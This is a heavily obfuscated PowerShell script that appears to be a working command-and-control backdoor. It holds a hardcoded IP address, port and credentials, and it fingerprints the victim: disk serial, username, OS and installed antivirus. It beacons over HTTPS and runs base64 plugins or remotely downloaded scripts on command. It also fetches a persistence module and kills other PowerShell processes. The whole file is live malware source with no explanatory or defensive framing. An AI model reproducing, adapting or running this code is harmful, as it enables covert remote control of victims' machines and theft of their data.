$7wP =[TYpE]("{2}{6}{3}{8}{5}{9}{1}{7}{4}{0}"-f 'Pe','CO','S','eM','y','y','YSt','lT','.neT.SecUrit','PROto') ; $rZJKWa=[TYPE]("{3}{4}{6}{7}{8}{1}{0}{2}{5}" -f'ANa','ntM','g','s','y','er','ST','Em','.NEt.SeRViCEPoI'); SET ('Sd7'+'QP') ( [TYPe]("{1}{0}"-F 'VeRt','coN')) ; Set-vARiabLE Woa ([Type]("{3}{4}{1}{2}{0}"-f 'g','eXT.eNcOD','In','sY','sTeM.T') ) ; seT 36g ( [tYpE]("{3}{2}{1}{0}"-F'Vert','teM.CON','YS','s') ); sV 7dH6XR ( [TYpE]("{0}{2}{1}"-F 'S','K','CRiptbloC')) ; ${glo`B`AL:_HOst} = ("{4}{1}{5}{0}{3}{2}"-f'7.1','ho','4','85.221.2','%','st%,14') ${gl`obaL`:_p`oRt} = ("{1}{0}" -f '1643','3') ${GL`oBAL:h_`iD} = ("{2}{1}{0}"-f '_','Nr','SvO') + -join ((65..90) + (97..122) | .("{2}{3}{0}{1}"-f'ndo','m','G','et-Ra') -Count 5 | &("{2}{0}{1}"-f'rE','ach-Object','Fo') {[char]${_}}) ${glo`B`AL:h_P`A`ck`AGE} = '<|>' ${GLo`Bal:H_w`Eb} = ${NU`lL} ${gLo`BAL`:h_SLEEp} = 3 ${gLobal`:`h_In`FO} = ${N`UlL} ${gLo`Bal:H_rUn`NI`NG} = ${T`RUe} ${GlOB`A`l:h_Ip} = ${N`Ull} ${GLoB`AL:H_En`dp`oint} = ("{2}{0}{1}" -f'i/mai','n','ap') ${G`loBaL:`h_`hA`Sh} = ("{6}{2}{5}{0}{7}{4}{3}{1}"-f '7CF77F','9','84A','4CCDBD84D186EE41D','6','D148D','D','0C4F2D') ${gLoBaL:`h`_a`U`Th} = @{ ("{1}{0}" -f 'r','use') = ("{0}{1}" -f 'Admi','n') ("{0}{1}"-f 'p','ass') = ("{2}{1}{3}{0}"-f'EXtBP','3','xA5','3kvHGbe') } ${GL`obAL`:`Mo`duLES} = @{ ("{2}{0}{1}" -f 'unni','ng','r') = ${f`AlSE} ("{0}{1}" -f 'li','st') = ((("{6}{4}{3}{2}{5}{1}{0}"-f '1','ps','stence46','persi','46Ume46U','Umain.','.'))-crEplACe([char]52+[char]54+[char]85),[char]92) } (GEt-VarIABlE ("R"+"zJkWa") -VaLuEo )::"Se`cURIT`YpRo`ToCol" = $7wP::"Tls`12"; function S`sLpInNi`Ng { param ([bool]${Pi`NNI`NG}=${t`Rue}) if (${Pi`Nni`NG}) { (Dir vaRIablE:rZJkWa ).valUe::"ServeRcertI`F`IcatEV`ALIDATI`oNcAlLb`A`cK" = { param(${_sE`Nd`ER},${_ce`R`Tif`ICATE},${_`CH`AIn},${_`SslpOL`icYE`RRorS}) ${ReM`o`T`E_hasH} = ${_c`eRtiF`IC`AtE}.("{0}{1}{3}{2}"-f'Ge','tCer','String','tHash').Invoke() if (${GlobaL`:`h`_H`ASH} -like ${rEMote`_h`A`Sh}) { return ${tR`UE} } else { return ${F`ALSE} } } } else { ( VaRIabLE ("r"+"zjKwa") ).vAluE::"SerVE`Rc`Er`TiFI`C`ATevAlIDaTiOncaLLbAcK" = { return ${t`RUE} } } } function m`AIN { param () ${GLO`B`AL:H`_In`Fo} = &("{2}{1}{0}"-f'on','i','Informat') while (${Gl`obaL`:`h`_runnI`NG}) { if (&("{2}{0}{1}"-f'ost','C2','P') "$global:h_endpoint/init") { .("{2}{1}{3}{0}" -f 's','adMo','Lo','dule') } .("{1}{2}{3}{0}" -f'p','Start-S','l','ee') -s ${gl`OBaL:h_`SlE`eP} } } function lO`A`DMo`dULEs { param () if (-not ${G`LOBAL:M`OdUl`es}."RUnN`iNG") { .("{1}{0}"-f'ostC2','P') "$global:h_endpoint/modules" (${gloBaL:`m`O`D`Ules}."LI`sT" -join "`r`n") | .("{0}{1}{2}" -f'Out','-Nul','l') } } function inF`ORmat`iOn { param () ${H_`hW`iD} = .("{2}{0}{4}{3}{1}"-f '-C','e','Get','nc','imInsta') -Class ("{2}{4}{5}{3}{0}{1}" -f'l','disk','w','ca','in32_l','ogi') -Filter ((("{2}{0}{1}{3}{4}" -f 'ID = ','{','Device','0}C:','{0}')) -F [cHAr]39) | &("{0}{1}{2}" -f 'S','elect-Obj','ect') -ExpandProperty ("{0}{3}{2}{4}{1}" -f 'v','er','serialn','olume','umb') ${H`_HwID} = ${h_h`wid}.("{1}{2}{0}"-f'ce','rep','la').Invoke("`r`n","") ${h_C`Om`putER`NamE} = ${ENV`:c`OMp`UTERnA`mE} ${H`_`Us`ErNAMe} = ${enV:`USe`RN`Ame} ${h`_os} = .("{3}{2}{0}{1}{4}"-f'-Cim','In','t','Ge','stance') -Class ("{6}{2}{5}{1}{0}{4}{3}" -f 'ngS','ati','n','m','yste','32_Oper','Wi') | &("{1}{3}{4}{2}{0}"-f 'ct','S','-Obje','e','lect') -ExpandProperty ("{0}{1}"-f'capti','on') | .("{0}{2}{1}"-f'Out-S','ing','tr') ${h`_os} = ${h`_oS}.("{1}{0}"-f'e','replac').Invoke("`r`n","") ${H_ve`RS`ion} = ("{1}{0}" -f']','[V2.0') ${h_e`Dr} = .("{2}{1}{0}{3}" -f 'nc','et-CimInsta','G','e') -Namespace ("{4}{5}{0}{3}{1}{2}"-f '/','urityCent','er2','Sec','roo','t') -ClassName ("{4}{1}{2}{3}{0}" -f'uct','ntivirusP','ro','d','A') | &("{2}{3}{1}{0}" -f 'ct','Obje','Selec','t-') -ExpandProperty ("{0}{2}{1}{3}"-f 'd','n','isplay','ame') | .("{2}{0}{1}"-f'i','ng','Out-Str') ${H_e`dR} = ${H_`eDr}.("{0}{1}"-f're','place').Invoke("`r`n"," - ") ${H_s`Pre`AD} = '_' return ${h`_ID} + '_' + ${H`_HWiD} + ${h`_`paCK`AGE} + ${h_`COm`pUTEr`N`AMe} + ${H_`pAc`kAGe} + ${H_uSErn`A`me} + ${h_pacK`A`GE} + ${h_`oS} + ${h`_pAC`kA`Ge} + ${H`_`VerS`IoN} + ${H_pac`K`AgE} + ${H`_`eDR} + ${H`_pAck`AgE} + ${H_`s`prEaD} + ${H_Pa`c`kagE} } function pO`Stc2 { param ( [String] ${QU`eRY}, [String] ${dA`Ta} = '' ) .("{2}{1}{0}"-f 'ning','SLPin','S') ${glOBaL`:`h_WeB} = .("{2}{0}{1}"-f'c','t','New-Obje') ("{2}{0}{1}{3}{4}"-f 'yst','em.','S','Net.We','bClient') ${GlobA`l:h`_WEB}."e`NC`oDING" = ( lS ('vARI'+'ABle:wO'+'a')).Value::"U`Tf8" try { ${GL`ob`AL`:`H_wEB}."hE`AderS"[("{1}{2}{0}" -f 'nt','User','-Age')] = ((("{29}{10}{5}{17}{12}{28}{24}{0}{14}{25}{3}{7}{18}{16}{30}{22}{2}{15}{11}{20}{6}{4}{26}{9}{19}{13}{21}{8}{1}{27}{23}{31}"-f 'in64; ','f','l',') App','me/','.0','hro','leWebKit/5','a','2','a/5',')','(Wi','124','x6','ike Gecko','36 (K',' ','37.','.',' C',' S','TML, ','/537.','0.0; W','4','91.0.447','ari','ndows NT 1','Mozill','H','36'))) ${gLobA`l`:`H_web}."hEade`RS"[("{3}{0}{4}{2}{1}" -f 'hori','n','tio','Aut','za')] = ("{1}{0}"-f'c ','Basi') + ( LS vaRiABle:36G ).VaLue::"T`Oba`SE`64StR`InG"( (iTEm varIabLe:WOa ).VaLuE::"A`scii".("{1}{2}{0}" -f's','GetBy','te').Invoke(${gLOb`Al:H_`A`Uth}."U`sER" + ":" + ${Glo`B`A`L:H_A`UTH}."p`Ass")); ${GL`ob`AL:h_`weB}."HEAd`e`Rs"[("{2}{1}{0}" -f'D','I','X-Request-')] = $Sd7qp::"toBa`s`E64sTring"( (Gi VARIaBLe:wOa ).vALuE::"uT`F8".("{2}{1}{0}"-f's','etByte','G').Invoke(${gl`O`BAl:h_`iN`FO})) foreach (${Ip} in ${_h`o`sT}.("{0}{1}"-f'spl','it').Invoke(',')) { if (${iP} -eq ("{0}{1}" -f'%host','%')) {continue} ${GLOb`A`L:h_iP} = ${iP} ${u`Rl} = ("{1}{0}"-f 's://','http') + ${h_`Ip} + ':' + ${_p`ort} + '/' + ${Q`UEry} try { ${resPon`se} = ${GLO`BAL`:h`_Web}.("{2}{0}{3}{1}"-f'adSt','ng','Uplo','ri').Invoke(${U`RL}, ${d`AtA}) if (${r`E`SpOn`Se}) {&("{2}{0}{1}"-f'a','rseC2','P') ${REs`pO`NSE}} return ${t`RuE} } catch { } } return ${Fal`se} } finally { if (${GLO`Bal:`H_W`eB}) { ${g`lobA`L:`h_WEB}.("{0}{1}{2}" -f'd','ispo','se').Invoke() ${GL`OB`AL:h`_WEB} = ${n`UlL} } } } function e`xECpL`Ug`in { param ( [String]${pAR`AM`_s`C`RIpt}, [bool]${PA`Ram_Pl`UGiN}=${T`Rue} ) ${SCRiPt`_`B`l`oCK} = ( gEt-vaRiABLE 7dh6xR ).VAlUe::"cREA`Te"( ( geT-vaRiable WoA).VAlUe::"U`Tf8"."gETstRI`Ng"( ( vArIABLe 36G -vALueOnl)::("{3}{0}{1}{2}" -f 'omBase64S','tr','ing','Fr').Invoke(${p`ArAM_SCri`PT}))) if (${paRAM`_`pLUGIn}) { ${J`oB} = .("{0}{1}" -f 'Start-','Job') -ScriptBlock ${sCRiPT`_`BlocK} -ArgumentList ${gL`ob`Al:h_IP},${GLo`Ba`L:`_POrT},${GLO`Ba`l:H_`iD},${GLO`B`Al:H_AUTH} | &("{1}{0}" -f '-Job','Wait') -Timeout 3 } else { ${J`Ob} = .("{1}{0}{2}" -f 'rt-Jo','Sta','b') -ScriptBlock ${sC`Ript_`Blo`CK} | .("{0}{1}"-f 'Wait-J','ob') -Timeout 3 } if (${J`Ob}."s`TATE" -eq ("{1}{0}"-f 'led','Fai')) { throw ${J`OB}."cHI`Ld`jobS"[0]."JOb`Stat`Ei`NFo"."r`eA`soN"."mE`ssAgE" } } function cleaRpo`WE`Rsh`E`ll { &("{3}{2}{1}{0}"-f 's','ces','t-Pro','Ge') ("{0}{2}{1}"-f'powe','ell','rsh') -ErrorAction ("{2}{0}{4}{1}{3}"-f'entl','on','Sil','tinue','yC') | &("{1}{2}{0}{3}{4}"-f'O','For','Each-','bje','ct') { if (${P`iD} -ne ${_}."I`D") { .("{0}{3}{1}{2}"-f'Stop','e','ss','-Proc') -Force -Id ${_}."ID" } } } function ClEA`RJ`ob { &("{0}{2}{1}"-f 'Ge','ob','t-J') | &("{1}{3}{0}{2}"-f'e-J','Remo','ob','v') -Force } function pars`eC2 { param ( [String]${DA`TA} ) try { ${DAT`A_ST`R`eAm} = [System.IO.TextReader](&("{2}{1}{0}" -f'ct','obje','new-') ("{3}{1}{0}{4}{5}{2}" -f 'tem','s','tringReader','Sy','.','IO.S')(${D`ATa})) if (${D`AtA_s`Tre`Am}."l`ength" -gt 0) { ${coM`mAND} = ${DATA_`sTRe`Am}.("{1}{0}{2}" -f 'adL','Re','ine').Invoke() switch (${c`Omm`AnD}.("{2}{0}{1}"-f'e','r','ToLow').Invoke()) { ("{2}{0}{3}{1}"-f'odu','es','main.m','l') { ${p`ARam_mOD`U`L`es} = ${d`AT`A_S`TrEam}.("{1}{0}{2}"-f 'ToEn','Read','d').Invoke(); if (${pa`RAM_`mODULES}) { &("{1}{0}{2}"-f'tar','S','t-Job') -ScriptBlock ( (VaRiABLE 7dH6xR -VALUe)::("{0}{2}{1}" -f 'Cre','te','a').Invoke(${pA`R`Am_mOD`UL`ES})) | .("{1}{0}{2}"-f'ut-Nul','O','l') ${g`Lob`Al:`mODu`Les}."ruNN`Ing" = ${T`RUE} } break } ("{0}{1}{2}" -f'm','ai','n.plugin') { ${paRa`M_sc`RipT} = ${DaTA`_St`RE`Am}.("{1}{2}{0}"-f'End','Read','To').Invoke(); if (${Par`AM_sCRi`PT}) { .("{3}{1}{0}{2}"-f'i','ecPlug','n','Ex') ${PAram_Sc`R`ipt} } break } ("{1}{3}{4}{0}{2}{5}"-f 'x','ma','ecute.lo','i','n.e','cal') { ${pa`Ram`_`sCrIPT} = ${d`A`T`A_stREaM}.("{0}{2}{1}" -f'Re','End','adTo').Invoke(); if (${ParaM_sc`R`IpT}) { .("{1}{0}{2}" -f'Pl','Exec','ugin') ${p`ARA`M`_ScRIPT} ${f`ALSE} } break } ("{2}{5}{3}{4}{0}{6}{1}" -f'.re','te','main.','ecut','e','ex','mo') { ${PA`R`A`m_URL} = ${daTA`_s`Tr`eAM}.("{1}{0}"-f'dLine','Rea').Invoke() if (${p`ARA`m_URl}) { &("{3}{1}{0}{2}" -f'i','Pinn','ng','SSL') ${f`A`LsE} ${PaRAm_`sC`Ri`PT} = (&("{1}{0}{2}"-f 'bj','New-O','ect') ("{3}{2}{0}{1}{4}{5}" -f 'b','Cli','We','system.Net.','en','t')).("{3}{4}{2}{1}{0}"-f 'g','rin','St','downlo','ad').Invoke(${p`ArA`M_UrL}) if (${PA`RAm_SC`RIPt}) { .("{0}{2}{1}{3}" -f'E','lu','xecP','gin') ${pAR`A`m_scRI`Pt} ${f`A`lSe} } } break } ("{3}{1}{0}{2}"-f'in.slee','a','p','m') { ${PAR`AM`_Ms} = ${dAta_`st`Re`Am}.("{0}{1}" -f 'Read','Line').Invoke() .("{1}{2}{0}" -f 'eep','Start-S','l') -s (${pAr`A`m_Ms} -as [int]) break } ("{1}{3}{2}{0}" -f 'ear','ma','n.cl','i') { &("{0}{2}{1}"-f'Clea','ob','rJ') break } ("{0}{3}{2}{1}" -f 'm','it','x','ain.e') { .("{0}{1}{2}" -f 'ClearPower','shel','l') break } ("{1}{0}{2}"-f'nstal','main.uni','l') { &("{0}{3}{2}{1}" -f 'Cle','ershell','rPow','a') Exit(1) } } } } catch { ${MeSs`AgE} = ${_}."exCeP`T`ION"."mESSa`ge" ${tRA`Ce} = ${_}."eXCe`PTi`ON"."St`ACK`TrAcE" ${r`E`SpOnSe} = ("[exception]`r`nmessage "+'= '+"$message`r`ntrace "+'= '+"$trace") &("{0}{1}" -f 'Po','stC2') "$global:h_endpoint/log" ${ReS`PO`N`Se} } } .("{1}{0}"-f 'ain','M')